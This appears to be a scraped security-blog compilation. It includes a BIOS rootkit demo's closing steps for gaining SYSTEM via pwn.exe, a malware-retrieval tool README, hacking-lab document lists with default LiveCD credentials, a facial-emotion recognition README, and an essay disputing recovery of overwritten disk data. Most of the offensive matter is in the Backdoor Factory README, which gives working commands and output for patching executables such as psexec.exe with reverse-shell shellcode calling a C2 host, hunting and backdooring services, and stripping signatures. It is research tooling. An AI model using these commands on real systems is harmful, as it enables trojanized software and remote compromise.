  • Now open and start the VM, then rename a program to pwn.exe (cmd.exe for example).
  • Wait 30 seconds, and then start the Task Manager. Pwn.exe should be running as user “SYSTEM” now instead of whatever user you are logged into XP with.

The list of steps described above should work in an ideal world. Testing has shown the following caveats however!

  • OS instability. Sometimes when booting or just simply closing your pwn.exe application Windows will BSOD.
  • Task Manager will lie about your process user if you open it in advance of the 30s permission escalation time. Use something like cmd with whoami to properly check what your permissions are.
  • While I have loaded this successfully onto a real PC, I take no responsibility for the results if you do the same. I’d love to hear about it if you brick your motherboard in some horrendous way, but I probably won’t actually be able to help you with it! Use at your own risk!
  • If you just want to watch a video of what this does, Colin has put one up on YouTube:

    I recommend actually trying it in VMware, it’s way more fun to see a hard drive wipe do nothing, and your system still affected!

TROOPERS 15 – Video Footage


TROOPERS15 Video Footage

Troopers15 is the eight edition of the great IT-Security Conference, where the world’s leading IT-Security experts and Hackers present their latest research.

Troopers provides a networking platform for Security interested people from all over the world and enables security folks from the industry, academia and the research community to exchange knowledge and talk about their work. Again, Troopers15 is going to be an event unlike most other “security conferences”: No pointless marketing talks, just high-end workshops with hands-on experiences and most importantly: You’ll get real answers and practical benefits to meet today’s and tomorrow’s threats.

Maltrieve – A tool to retrieve malware directly from the source for security researchers.


Maltrieve

Maltrieve originated as a fork of mwcrawler.

This tool retrieves malware directly from the sources as listed at a number of sites, including:

These lists will be implemented if/when they return to activity.

Improvements

  • Proxy support
  • Multithreading for improved performance
  • Logging of source URLs
  • Multiple user agent support
  • Better error handling
  • VxCage and Cuckoo Sandbox support

Dependencies

Usage

Basic execution: python maltrieve.py

Options

usage: maltrieve.py [-h] [-p PROXY] [-d DUMPDIR] [-l LOGFILE] [-x] [-c]

optional arguments:
  -h, --help            show this help message and exit
  -p PROXY, --proxy PROXY
                        Define HTTP proxy as address:port
  -d DUMPDIR, --dumpdir DUMPDIR
                        Define dump directory for retrieved files
  -l LOGFILE, --logfile LOGFILE
                        Define file for logging progress
  -x, --vxcage          Dump the file to a VxCage instance running on the
                        localhost
  -c, --cuckoo          Enable cuckoo analysis

More information can be found at: https://github.com/krmaxwell/maltrieve

Documents and Videos + LiveCD from hacking-lab.com


Documents and Videos from hacking-lab.com

Date Type Description Author
2014 pdf Fritzbox Security Analysis by bias bias
2014 pdf How to setup a VirtualBox Server by bias bias
2014 pdf Hacky Easter 2013 Solutions and Write-Ups PS
2012 Dec pdf Hacking-Lab Magazine 3 E1
2012 July pdf Hacking-Lab Magazine 2 E1
2012 Mar pdf Hacking-Lab Magazine 1 E1
2010 May pdf Find Differences with Integrity Checking Software (AIDE) E1
2010 Mar pdf SSH Shell Monitoring on Solaris10 E1
2010 Mar pdf Windows DNS Tunneling Attack & Virus Construction Kit E1
2010 Feb pdf XSS in .NET ViewState Education Movie +  pdf Intro PDF  + pdf High Resolution MOVIE Afames
2010 Feb pdf MCTA (German) Slides Mobile Devices Security Superhacker
2010 Jan pdf Movie: Observation Firefox Plugin
E1
2010 Jan pdf Movie: PART 2: Reverse Proxy for Facebook & Pre-Auth & Session Hiding (KnowHow) E1
2010 Jan pdf Convert GeoIP ip ranges for your security tool E1
2010 Jan pdf Movie: PART 1: Reverse Proxy for Facebook (KnowHow) E1
2009 Dec pdf Movie: Etterfilter – Injection malicious payload into web traffic (MitM) iMan
2009 Nov pdf Movie: SSL Renegotiation Attack
E1
2009 Nov pdf Movie: We are all frogs (surveillance awareness) Viktor
2009 Nov pdf Defense in-depth – Better protection against 0-day exploitation E1
2009 Nov pdf Übles Incident Management bei STRATO – Java Script E1
2009 Oct pdf Multiple Firefox Instances – German Text E1
2009 Oct pdf Hacking-Lab – Bericht in Network Computing DE  remove
2009 Sep pdf Wie erstellt man eine Mac OS X Anwendung aus einem JAR File  x3l
2009 Sep pdf Logfile Monitoring using Swatch  E1
2009 Sep pdf Set-Cookie: Path is not a Security Boundary  E1
2009 Sep pdf Using Nmap results in Metasploit and start db_autopwn  E1
2009 Sep pdf Add your own ruby scripts to the MetaSploit 3 framework  E1
2009 Aug pdf Analyzing NMAP 5 results with MySQL  E1
2009 Aug pdf Using NMAP Output (XML) in Nessus Scans  E1
2009 Jun pdf Social Engineering Test Cases  E1
2009 Jun pdf Challenge of the Month – June 2009 – Windows Privilege Escalation  E1
2009 May pdf Character Conversion (UTF-7, UTF-8) using recode (Apache < 2.2.6 XSS)  E1

For some of the downloads you would need to open a free user account on hacking-lab.com


Research Papers

Cat. Title Description Rating Files Published Author
Web SecurityProgramming 10000 Java Web Application Protection Framework Evaluation: AntiSamy, catnip, GreatWebGuy, XSS filter
2012-11-15 07:55:34 PS
Malware 10001 General Malware Analysis History Of Malware
2013-04-24 10:04:24 dreadknight
Malware 10001 General Malware Analysis Quick Analysis of an Online Banking Trojan by PS
2013-05-15 11:32:32 PS
Web Security 10002 Research: Advanced SQL Injection Advanced SQL Injection Attacks & Mitigation
2014-01-04 10:35:08 PS

Hacking-Lab LiveCD

Hacking-Lab LiveCD, get it from: http://media.hacking-lab.com/largefiles/livecd

This ist the LiveCD project of Hacking-Lab (www.hacking-lab.com).
It gives you OpenVPN access into Hacking-Labs Remote Security Lab. 
The LiveCD iso image runs very good natively on a host OS, or within a 
virtual environment (VMware, VirtualBox). However, if you expect 
improved screen resolution, drag and drop support with your Host OS, 
then we recommend to use a VirtualBox Appliance. 

Please read the following readme to get familiar with downloading
and using the LiveCD ISO image or VirtualBox appliance. t
* http://media.hacking-lab.com/largefiles/livecd/readme.txt


LiveCD Release 8.00 and above
=====================================================

username = hacker
password = compass
root password = compass

apt-get update
apt-get upgrade
apt-get dist-upgrade



OpenVPN Question
=====================================================
You will gain VPN access if both of the following pre-requirements are fulfilled. 

a) you have a valid hacking-lab username and password
b) you are registered for a vpn enabled event 

Please note; if your account is *NOT* assigned to a running Hacking-Lab event,
you cannot connect using OpenVPN (even if your password is valid!). Unfortunately
the openvpn error is telling you, that your username or password is invalid.


LiveCD Updates
=====================================================
The LiveCD will get updated once per month. We dislike the idea of 
letting you using an outdated linux distro (old kernels and more)
Please make sure, you are getting the latest LiveCD from here from time to time

Our update mechanism includes
a) updating ubuntu packages
b) updating metasploint (svn update)
c) updating browser
d) updating kernel 

-> this process is fully automated. We can create new ISO images in 10 minutes. Please
tell us if you are missing a tool or if something is not as expected.

The Backdoor Factory (BDF) – Patch PE, ELF, Mach-O binaries with shellcode


The Backdoor Factory (BDF)

For security professionals and researchers only.

The goal of BDF is to patch executable binaries with user desired shellcode and continue normal execution of the prepatched state.

DerbyCon 2014 Presentation: http://www.youtube.com/watch?v=LjUN9MACaTs

Contact the developer on:

IRC:
irc.freenode.net #BDFactory 

Twitter:
@midnite_runr

Under a BSD 3 Clause License

See the wiki: https://github.com/secretsquirrel/the-backdoor-factory/wiki

Dependences

Capstone engine can be installed from PyPi with:

sudo pip install capstone

Pefile, most recent: https://code.google.com/p/pefile/

Kali Install:

  apt-get update
  apt-get install backdoor-factory

Other *NIX/MAC INSTALL:

./install.sh

This will install Capstone with 3.01 pip to install pefile.

UPDATE:

./update.sh

Supporting:

Windows PE x86/x64,ELF x86/x64 (System V, FreeBSD, ARM Little Endian x32), 
and Mach-O x86/x64 and those formats in FAT files

Packed Files: PE UPX x86/x64

Experimental: OpenBSD x32 

Some executables have built in protections, as such this will not work on all binaries. It is advisable that you test target binaries before deploying them to clients or using them in exercises. I’m on the verge of bypassing NSIS, so bypassing these checks will be included in the future.

Many thanks to Ryan O'Neill --ryan 'at' codeslum <d ot> org--
Without him, I would still be trying to do stupid things 
with the elf format.
Also thanks to Silvio Cesare with his 1998 paper 
(http://vxheaven.org/lib/vsc01.html) which these ELF patching
techniques are based on.

From DerbyCon:

Video: http://www.youtube.com/watch?v=jXLb2RNX5xs

Injection Module Demo: http://www.youtube.com/watch?v=04aJAex2o3U

Slides: http://www.slideshare.net/midnite_runr/patching-windows-executables-with-the-backdoor-factory

Recently tested on many binaries.

./backdoor.py -h Usage: backdoor.py [options]

Options:
  -h, --help            show this help message and exit
  -f FILE, --file=FILE  File to backdoor
  -s SHELL, --shell=SHELL
                        Payloads that are available for use. Use 'show' to see
                        payloads.
  -H HOST, --hostip=HOST
                        IP of the C2 for reverse connections.
  -P PORT, --port=PORT  The port to either connect back to for reverse shells
                        or to listen on for bind shells
  -J, --cave_jumping    Select this options if you want to use code cave
                        jumping to further hide your shellcode in the binary.
  -a, --add_new_section
                        Mandating that a new section be added to the exe
                        (better success) but less av avoidance
  -U SUPPLIED_SHELLCODE, --user_shellcode=SUPPLIED_SHELLCODE
                        User supplied shellcode, make sure that it matches the
                        architecture that you are targeting.
  -c, --cave            The cave flag will find code caves that can be used
                        for stashing shellcode. This will print to all the
                        code caves of a specific size.The -l flag can be use
                        with this setting.
  -l SHELL_LEN, --shell_length=SHELL_LEN
                        For use with -c to help find code caves of different
                        sizes
  -o OUTPUT, --output-file=OUTPUT
                        The backdoor output file
  -n NSECTION, --section=NSECTION
                        New section name must be less than seven characters
  -d DIR, --directory=DIR
                        This is the location of the files that you want to
                        backdoor. You can make a directory of file backdooring
                        faster by forcing the attaching of a codecave to the
                        exe by using the -a setting.
  -w, --change_access   This flag changes the section that houses the codecave
                        to RWE. Sometimes this is necessary. Enabled by
                        default. If disabled, the backdoor may fail.
  -i, --injector        This command turns the backdoor factory in a hunt and
                        shellcode inject type of mechinism. Edit the target
                        settings in the injector module.
  -u SUFFIX, --suffix=SUFFIX
                        For use with injector, places a suffix on the original
                        file for easy recovery
  -D, --delete_original
                        For use with injector module.  This command deletes
                        the original file.  Not for use in production systems.
                        *Author not responsible for stupid uses.*
  -O DISK_OFFSET, --disk_offset=DISK_OFFSET
                        Starting point on disk offset, in bytes. Some authors
                        want to obfuscate their on disk offset to avoid
                        reverse engineering, if you find one of those files
                        use this flag, after you find the offset.
  -S, --support_check   To determine if the file is supported by BDF prior to
                        backdooring the file. For use by itself or with
                        verbose. This check happens automatically if the
                        backdooring is attempted.
  -M, --cave-miner      Future use, to help determine smallest shellcode
                        possible in a PE file
  -q, --no_banner       Kills the banner.
  -v, --verbose         For debug information output.
  -T IMAGE_TYPE, --image-type=IMAGE_TYPE
                        ALL, x86, or x64 type binaries only. Default=ALL
  -Z, --zero_cert       Allows for the overwriting of the pointer to the PE
                        certificate table effectively removing the certificate
                        from the binary for all intents and purposes.
  -R, --runas_admin     Checks the PE binaries for 'requestedExecutionLevel
                        level="highestAvailable"'. If this string is included
                        in the binary, it must run as system/admin. Doing this
                        slows patching speed significantly.
  -L, --patch_dll       Use this setting if you DON'T want to patch DLLs.
                        Patches by default.
  -F FAT_PRIORITY, --FAT_PRIORITY=FAT_PRIORITY
                        For MACH-O format. If fat file, focus on which arch to
                        patch. Default is x64. To force x86 use -F x86, to
                        force both archs use -F ALL.

Features:

PE Files

Can find all codecaves in an EXE/DLL.
By default, clears the pointer to the PE certificate table, thereby unsigning a binary.
Can inject shellcode into code caves or into a new section.
Can find if a PE binary needs to run with elevated privileges.
When selecting code caves, you can use the following commands:
  -Jump (j), for code cave jumping
  -Single (s), for patching all your shellcode into one cave
  -Append (a), for creating a code cave
  -Ignore (i), nevermind, ignore this binary
Can ignore DLLs.
Import Table Patching

ELF Files

Extends 1000 bytes (in bytes) to the TEXT SEGMENT and injects shellcode into that section of code.

Mach-O Files

Pre-Text Section patching and signature removal

Overall

The user can :
  -Provide custom shellcode.
  -Patch a directory of executables/dlls.
  -Select x32 or x64 binaries to patch only.
  -Include BDF is other python projects see pebin.py and elfbin.py

Sample Usage:

Patch an exe/dll using an existing code cave:

./backdoor.py -f psexec.exe -H 192.168.0.100 -P 8080 -s reverse_shell_tcp 

[*] In the backdoor module
[*] Checking if binary is supported
[*] Gathering file info
[*] Reading win32 entry instructions
[*] Looking for and setting selected shellcode
[*] Creating win32 resume execution stub
[*] Looking for caves that will fit the minimum shellcode length of 402
[*] All caves lengths:  (402,)
############################################################
The following caves can be used to inject code and possibly
continue execution.
**Don't like what you see? Use jump, single, append, or ignore.**
############################################################
[*] Cave 1 length as int: 402
[*] Available caves:
1. Section Name: .data; Section Begin: 0x2e400 End: 0x30600; Cave begin: 0x2e4d5 End: 0x2e6d0; Cave Size: 507
2. Section Name: .data; Section Begin: 0x2e400 End: 0x30600; Cave begin: 0x2e6e9 End: 0x2e8d5; Cave Size: 492
3. Section Name: .data; Section Begin: 0x2e400 End: 0x30600; Cave begin: 0x2e8e3 End: 0x2ead8; Cave Size: 501
4. Section Name: .data; Section Begin: 0x2e400 End: 0x30600; Cave begin: 0x2eaf1 End: 0x2ecdd; Cave Size: 492
5. Section Name: .data; Section Begin: 0x2e400 End: 0x30600; Cave begin: 0x2ece7 End: 0x2eee0; Cave Size: 505
6. Section Name: .data; Section Begin: 0x2e400 End: 0x30600; Cave begin: 0x2eef3 End: 0x2f0e5; Cave Size: 498
7. Section Name: .data; Section Begin: 0x2e400 End: 0x30600; Cave begin: 0x2f0fb End: 0x2f2ea; Cave Size: 495
8. Section Name: .data; Section Begin: 0x2e400 End: 0x30600; Cave begin: 0x2f2ff End: 0x2f4f8; Cave Size: 505
9. Section Name: .data; Section Begin: 0x2e400 End: 0x30600; Cave begin: 0x2f571 End: 0x2f7a0; Cave Size: 559
10. Section Name: .rsrc; Section Begin: 0x30600 End: 0x5f200; Cave begin: 0x5b239 End: 0x5b468; Cave Size: 559
**************************************************
[!] Enter your selection: 5
Using selection: 5
[*] Changing Section Flags
[*] Patching initial entry instructions
[*] Creating win32 resume execution stub
[*] Overwriting certificate table pointer
[*] psexec.exe backdooring complete
File psexec.exe is in the 'backdoored' directory

Patch an exe/dll by adding a code section:

./backdoor.py -f psexec.exe -H 192.168.0.100 -P 8080 -s reverse_shell_tcp -a 
[*] In the backdoor module
[*] Checking if binary is supported
[*] Gathering file info
[*] Reading win32 entry instructions
[*] Looking for and setting selected shellcode
[*] Creating win32 resume execution stub
[*] Creating Code Cave
- Adding a new section to the exe/dll for shellcode injection
[*] Patching initial entry instructions
[*] Creating win32 resume execution stub
[*] Overwriting certificate table pointer
[*] psexec.exe backdooring complete
File psexec.exe is in the 'backdoored' directory

Patch a directory of exes:

./backdoor.py -d test/ -i 192.168.0.100 -p 8080 -s reverse_shell_tcp -a
...output too long for README...

User supplied shellcode:

msfpayload windows/exec CMD='calc.exe' R > calc.bin
./backdoor.py -f psexec.exe -s user_supplied_shellcode -U calc.bin
This will pop calc.exe on a target windows workstation. So 1337. Much pwn. Wow.

Hunt and backdoor: Injector | Windows Only

The injector module will look for target executables to backdoor on disk.  It will check to see if you have identified the target as a service, check to see if the process is running, kill the process and/or service, inject the executable with the shellcode, save the original file to either file.exe.old or another suffix of choice, and attempt to restart the process or service.  
Edit the python dictionary "list_of_targets" in the 'injector' module for targets of your choosing.

./backdoor.py -i -H 192.168.0.100 -P 8080 -s reverse_shell_tcp -a -u .moocowwow 

More info about this project can be found at: https://github.com/secretsquirrel/the-backdoor-factory


Changelog

2/14/2014

I <3 you guys

  • Added Import Address Table patching for PEs to support iat_reverse_tcp payloads that use the import table for winAPI calls. If the binary you are patching does not have LoadLibraryA and GetProcAddress, for example, BDF will patch it in to a new Import Table in a new section. Supports x64/x86 PEs.
  • Added iat_reverse_tcp for x64 PEs.
  • Bug fixes and improvements

1/1/2015

Happy New Year!

Two new OS X payloads! The delay: delay_reverse_shell_tcp

-B 30 –> delay the payload for 30 seconds, main code runs right away.

Setting of firm capstone commit for building into BDF, capstone ‘Next’ repo breaks BDF.

Fixes to support cython capstone implementation null byte truncation issue

12/27/2014

Added payloadtests.py

This script will output patched files in backdoored that will allow for the user to test the payloads as they wish. Each payload type increments the port used by one.

Usage: payloadtest.py binary HOST PORT

12/17/2014

OS X Beaconing Payloads for x86 and x64: beaconing_reverse_shell_tcp

-B 15 –> set beacon time for 15 secs

Bug fix to support OS X for BDFProxy

10/11/2014

PE UPX Patching Added

9/26/2014

Mach-O x86/x64 added

x86 IAT payload optimization

7/31/2014

Added support for ARM x32 LE ELF patching

7/22/2014

Added FreeBSD x32 ELF patching support

Change to BSD 3 Clause License

7/13/2014

Incorporated Capstone: http://www.capstone-engine.org/

During the process of adding Capstone, I removed about 500 lines of code. That’s pretty awesome.

Renamed loadliba_reverse_tcp to iat_reverse_tcp.

Small optimizations for speed.

5/30/2014

Added a new win86 shellcode: loadliba_reverse_tcp

More information about this project can be found at: https://github.com/secretsquirrel/the-backdoor-factory

Emotime – Recognizing emotional states in faces


Emotime

Recognizing emotional states in faces


Authors: Luca Mella, Daniele Bellavista

Development Status: Experimental

Copyleft: CC-BY-NC 2013

Project Page: https://github.com/luca-m/emotime


Goal

This project aims to recognize main facial expressions (neutral, anger, disgust, fear, joy, sadness, surprise) in image sequences using the approaches described in:

References

Here is listed some interesting material about machine learning, opencv, gabor transforms and other stuff that could be useful to get in this topic:

Project Structure

src
  \-->dataset        Scripts for dataset management
  \-->facecrop       Utilities and modules for face cropping and registration
  \-->gaborbank      Utilities and modules for generating gabor filters and image filtering
  \-->adaboost       Utilities and modules for adaboost train, prediction, and feature selection
  \-->svm          Utilities and modules for svm training and prediction
  \-->detector     Multiclass detector and preprocessor
  \-->utils        String and IO utilities, CSV supports, and so on..
doc                Documentation (doxigen)
report             Class project report (latex)
resources          Containing third party resources (eg. OpenCV haar classifiers)
assets             Binary folder
test               Some testing scripts here

Build

Dependencies:

  • CMake >= 2.8
  • Python >= 2.7, < 3.0
  • OpenCV >= 2.4.5

Compiling on linux:

  • mkdir build
  • cd build
  • cmake .. ; make ; make install – now the asset folder should be populated

Cross-compiling for windows:

  • Using CMake or CMakeGUI, select emotime as source folder and configure.
  • If it complains about setting the variable OpenCV_DIR set it to the appropriate path so that:
    • C:/path/to/opencv/dir/ contains the libraries (*.lib)
    • C:/path/to/opencv/dir/include contains the include directories (opencv and opencv2)
    • IF the include directory is missing the project will likely not be able to compile due to missing reference to opencv2/opencv or similar.
  • Then generate the project and compile it.
  • This was tested with Visual Studio 12 64 bit.

Detection and Prediction

Proof of concept model trained using faces extracted using the detector cbcl1 are available for download, mulclass strategy 1 vs all and many vs many can be found.

NOTE: watch for illumination! At the moment optimal results can be obtained in live webcam sessions using direct illumination directed to the user’s face. Don’t worry you are not required to blind you with a headlight.

If you’d like to try emotime without any further complication you should take a look to thex86_64 release.

Usage

Video gui:

echo "VIDEOPATH" | ./emotimevideo_cli FACEDETECTORXML (EYEDETECTORXML|none) WIDTH HEIGHT NWIDTHS NLAMBDAS NTHETAS (svm|ada) (TRAINEDCLASSIFIERSXML)+

Cam gui:

./emotimegui_cli FACEDETECTORXML (EYEDETECTORXML|none) WIDTH HEIGHT NWIDTHS NLAMBDAS NTHETAS (svm|ada) (TRAINEDCLASSIFIERSXML)+

Or using the python script:

python gui.py --cfg <dataset_configuration_path> --mode svm --eye-correction <dataset_path>

Binary Release and Trained Models

If you just want to take a quick look to the project we strongly suggest to go to the release section and download compiled binaries for Linux 64bit, then:

  • download and unzip the binaries in an empty folder
  • run ./download_trained_models.sh
  • Then cd assets and ./emotimegui_cli ../resources/haarcascade_frontalface_cbcl1.xml none 48 48 3 5 4 svm ../dataset_svm_354_cbcl1_1vsallext/classifiers/svm/*

Training

After mkdir build; cd build; cmake ..; make ; make install go to the assets folder and:

  1. Initialize a dataset using:
    python datasetInit.py -cfg <CONFIGFILE> <EMPTY_DATASET_FOLDER>
    
  2. Then fill it with your images or use the Cohn-Kanade importing script:
    python datasetFillCK --cfg <CONFIGFILE> <DATASETFOLDER> <CKFOLDER> <CKEMOTIONFOLDER>
    
  3. Now you are ready to train models:
    python train_models.py --cfg <CONFIGFILE> --mode svm --prep-train-mode [1vsall|1vsallext] <DATASETFOLDER>
    

Dataset

The Cohn-Kanade database is one of the most used faces database. Its extended version (CK+) contains also FACS code labels (aka Action Units) and emotion labels (neutral, anger, contempt, disgust, fear, happy, sadness, surprise).

Validation

First, rough evaluation of the performance of the system Validation test involved the whole systemface detector + emotion classifier, so should not be considered relative to the emotion classifieritself.

Of course, a more fine validation shuld be tackled in order to evaluate emotion classifier alone. For the sake of completeness the reader have to know that the cbcl1 face model is a good face locator rather than detector, roughly speaking it detects less but is more precise.

Following results are commented with my personal – totally informal – evaluation after live webcam session.

multicalss method: 1vsAllExt 
face detector:     cbcl1
eye correction:    no 
width:             48
height:            48 
nwidths:           3 
nlambdas:          5
nthetas:           4

Sadness                   <-- Not good in live webcam sessions too
  sadness -> 0.67%
  surprise -> 0.17%
  anger -> 0.17%
Neutral                   <-- Good in live webcam sessions
  neutral -> 0.90%
  contempt -> 0.03%
  anger -> 0.03%
  fear -> 0.02%
  surprise -> 0.01%
Disgust                   <-- Good in live webcam sessions
  disgust -> 1.00%
Anger                     <-- Good in live webcam sessions
  anger -> 0.45%
  neutral -> 0.36%
  disgust -> 0.09%
  contempt -> 0.09%
Surprise                  <-- Good in live webcam sessions
  surprise -> 0.94%
  neutral -> 0.06%
Fear                      <-- Almost Good in live webcam sessions
  fear -> 0.67%
  surprise -> 0.17%
  happy -> 0.17%
Contempt                  <-- Not good in live webcam sessions
  neutral -> 0.50%
  contempt -> 0.25%
  anger -> 0.25%
Happy                     <-- Good in live webcam sessions
  happy -> 1.00%
multicalss method: 1vsAll 
face detector:     cbcl1
eye correction:    no 
width:             48
height:            48 
nwidths:           3 
nlambdas:          5
nthetas:           4

Sadness                   <-- Not good in live webcam sessions too
  unknown -> 0.50%
  sadness -> 0.33%
  fear -> 0.17%
Neutral                   <-- Good in live webcam sessions 
  neutral -> 0.73%
  unknown -> 0.24%
  surprise -> 0.01%
  fear -> 0.01%
  contempt -> 0.01%
Disgust                   <-- Good in live webcam sessions
  disgust -> 0.82%
  unknown -> 0.18%
Anger                     <-- Almost sufficient in live webcam sessions
  anger -> 0.36%
  neutral -> 0.27%
  unknown -> 0.18%
  disgust -> 0.09%
  contempt -> 0.09%
Surprise                  <-- Good in live webcam sessions
  surprise -> 0.94%
  neutral -> 0.06%
Fear                      <-- Sufficient in live webcam sessions
  fear -> 0.67%
  surprise -> 0.17%
  happy -> 0.17%
Contempt                  <-- Not good in live webcam sessions too
  unknown -> 1.00%
Happy                     <-- Good in live webcam sessions 
  happy -> 1.00%

Also main difference between the 1vsAll and the 1vsAllExt mode experimented in livecam sessions are related to the amount of unknown states registered and the stability of the detected states. In detail 1vsAll multiclass method provide more less noisy detections during a live web-cam session, 1vsAllExt mode instead is able to always predict a valid state for each frame processed, but sometimes it result to be more unstable during the expression transition.

Sorry for the lack of fine tuning and detail, but it is a spare time project at the moment.. If you have any idea or suggestion feel free to write us!

Further Development

  • Tuning GaborBank parameters for accuracy enhancement.
  • Tuning image sizes for better real-time performance.
  • Better handle illumination, detections are good when frontal light is in place (keep it in mind when you use it with your camera).

More info about this project can be found at: https://github.com/luca-m/emotime

Can Intelligence Agencies Read Overwritten Data?


Can Intelligence Agencies Read Overwritten Data? A response to Gutmann.

A German translation here

Claims that intelligence agencies can read overwritten data on disk drives have been commonplace for many years now. The most commonly cited source of evidence for this supposed fact is a paper (Secure Deletion of Data from Magnetic and Solid-State Memory) by Peter Gutmann presented at a 1996 Usenix conference. I found this an extraordinary claim, and therefore deserving of extraordinary proof. Thanks to an afternoon at the Harvard School of Applied Science library I have had a chance to examine the paper (http://www.usenix.org/publications/library/proceedings/sec96/full_papers/gutmann/index.html ) and many of the references contained therein.

Of course, modern operating systems can leave copies of ” deleted” files scattered in unallocated sectors, temporary directories, swap files, remapped bad blocks, etc, but Gutmann believes that an overwritten sector can be recovered under examination by a sophisticated microscope and this claim has been accepted uncritically by numerous observers. I don’t think these observers have followed up on the references in Gutmann’s paper, however.

Gutmann explains that when a 1 bit is written over a zero bit, the “actual effect is closer to obtaining a .95 when a zero is overwritten with a one, and a 1.05 when a one is overwritten with a one”. Given that, and a read head 20 times as sensitive as the one in a production disk drive, and also given the pattern of overwrite bits, one could recover the under-data.

The references Gutmann provides suggest that his piece is much overwrought. None of the references lead to examples of sensitive information being disclosed. Rather, they refer to experiments where STM microscopy was used to examine individual bits, and some evidence of previously written bits was found.

There is a large literature on the use of Magnetic Force Scanning Tunneling Microscopy (MFM or STM) to image bits recorded on magnetic media. The apparent point of this literature is not to retrieve overwritten data, but to test and improve the design of drive read/write heads. Two of the references (Rugar et al, Gomez et al) had pictures of overwritten bits, showing parts of the original data clearly visible in the micro-photograph. These were considered by the authors as examples of sub-optimal head design. The total number of bits seen was 6 in one photo and 8 in the other. Neither photo-micrograph was a total success, because in one case only transitions from one to zero were visible, and in the other case one of the transitions was ambiguous. Nevertheless, I accept that overwritten bits might be observable under certain circumstances.

So I can say that Gutmann doesn’t cite anyone who claims to be reading the under-data in overwritten sectors, nor does he cite any articles suggesting that ordinary wipe-disk programs wouldn’t be completely effective.

I should qualify that last paragraph a “bit”. I was unable to locate a copy of the masters thesis with the tantalizing title “Detection of Digital Information from Erased Magnetic Disks” by Venugopal Veeravalli. However a brief visit to his web page shows that this was never published, he has never published on this or a related topic (his field is security of mobile communications) and his other work does not suggest familiarity with STM microscopes. So I am fairly sure he didn’t design a machine to read under-data with an “unwrite” system call. In an email message to me Dr. Veeravalli said that his work was theoretical, and studied the possibility of using DC erase heads. [Since writing this paragraph the paper has been posted. It is indeed theoretical but has quantitative predictions about the possibility of recovering data with varying degrees of erasure. There isn’t any suggestion that ordinary erase procedures would be inadequate].

Gutmann claims that “Intelligence organisations have a lot of expertise in recovering these palimpsestuous images.” but there is no reference for that statement. There are 18 references in the paper, but none of the ones I was able to locate even referred to that possibility. Subsequent articles by diverse authors do make that claim, but only cite Gutmann, so they do not constitute additional evidence for his claim.

Gutmann mentions that after a simple setup of the MFM device, that bits start flowing within minutes. This may be true, but the bits he refers to are not from disk files, but pixels in the pictures of the disk surface. Charles Sobey has posted an informative paper “Recovering Unrecoverable Data” with some quantitative information on this point. He suggests that it would take more than a year to scan a single platter with recent MFM technology, and tens of terabytes of image data would have to be processed.

In one section of the paper Gutmann suggests overwriting with 4 passes of random data. That is apparently because he anticipates using pseudo-random data that would be known to the investigator. A single write is sufficient if the overwrite is truly random, even given an STM microscope with far greater powers than those in the references. In fact, data written to the disk prior to the data whose recovery is sought will interfere with recovery just as must as data written after – the STM microscope can’t tell the order in which magnetic moments are created. It isn’t like ink, where later applications are physically on top of earlier markings.

After posting this information to a local mailing list, I received a reply suggesting that the recovery of overwritten data was an industry, and that a search on Google for “recover overwritten data” would turn up a number of firms offering this service commercially. Indeed it does turn up many firms, but all but one are quite explicit that they can recover “overwritten files”, which is quite a different matter. An overwritten file is one whose name has been overwritten, not its sectors. Likewise, partitioning, formatting, and “Ghosting” typically affect only a small portion of the physical disk, leaving plenty of potential for sector reads to reveal otherwise hidden data. There is no implication in the marketing material that these firms can read physically overwritten sectors. The one exception I found (Dataclinic in the UK) did not respond to an email enquiry, and they do not mention any STM facility on their web site.

A letter from an Australian homicide investigator confirms my view that even police agencies have no access to the technology Gutmann describes.

Of course it has been several years since Gutmann published. Perhaps microscopes have gotten better? Yes, but data densities have gotten higher too. A hour on the web this month looking at STM sites failed to come up with a single laboratory claiming it had an ability to read overwritten data.

Recently I was sent a fascinating piece by Wright, Kleiman and Sundhar (2008) who show actual data on the accuracy of recovered image data. While the images include some information about underlying bits, the error rate is so high that it is difficult to imagine any use for the result. While the occasional word might be recovered out of thousands, the vast majority of apparently recovered words would be spurious.

Another fact to ponder is the failure of anyone to read the “18 minute gap” Rosemary Woods created on the tape of Nixon discussing the Watergate break-in. In spite of the fact that the data density on an analog recorder of in the 1960s was approximately one million times less than current drive technology, and that audio recovery would not require a high degree of accuracy, not one phoneme has been recovered.

The requirements of military forces and intelligence agencies that disk drives with confidential information be destroyed rather than erased is sometimes offered as evidence that these agencies can read overwritten data. I expect the real explanation is far more prosaic. The technician tasked with discarding a hard drive may or may not have enough computer knowledge to know if running the command “urandom >/dev/sda2c1” has covered an entire disk with random data, or only one partition, nor is it easy to confirm that it was done. How would you confirm that the overwrite was not pseudo-random? Smashing the drive with a sledgehammer is easy to do, easy to confirm, and very hard to get wrong. The GPL’ed package DBAN is an apparent attempt to address this uncertainty without destroying hardware. Hardware appliances with similar aims include the Drive Erazer” and the Digital Shredder.

Surveying all the references, I conclude that Gutmann’s claim belongs in the category of urban legend.

Or it may be in the category of marketing hype. I note that it is being used to sell a software package called “The Annililator”.

Since writing the above, I have noticed a comment attributed to Gutmann conceding that overwritten sectors on “modern” (post 2003?) drives can not be read by the techniques outlined in the 1996 paper, but he does not withdraw the overwrought claims of the paper with respect to older drives.

An updated copy of this memo will be kept at http://www.nber.org/sys-admin/overwritten-data-gutmann.html. Additional information may be sent to feenberg at nber dot org.

Daniel Feenberg
National Bureau of Economic Research
Cambridge MA
USA
21 July 2003
24 March 2004 (revised)
22 April 2004 (revised)
14 May 2004 (revised)
1 Oct 2011 (correction)
1 Jan 2013 (corrections)

“Magnetic force microscopy: General principles and application to longitudinal recording media”, D.Rugar, H.Mamin, P.Guenther, S.Lambert, J.Stern, I.McFadyen, and T.Yogi, Journal of Applied Physics, Vol.68, No.3 (August 1990), p.1169.

“Magnetic Force Scanning Tunnelling Microscope Imaging of Overwritten Data”, Romel Gomez, Amr Adly, Isaak Mayergoyz, Edward Burke, IEEE Trans.on Magnetics, Vol.28, No.5 (September 1992), p.3141.

Wright, C.; Kleiman, D, & Sundhar S. R. S.: (2008) “Overwriting Hard Drive Data: The Great Wiping Controversy”. ICISS 2008: 243-257 http://portal.acm.org/citation.cfm?id=1496285 or http://www.vidarholen.net/~vidar/overwriting_hard_drive_data.pdf . See also a summary at http://sansforensics.wordpress.com/2009/01/15/overwriting-hard-drive-data/

Free Trade Magazine Subscriptions & Technical Document Downloads


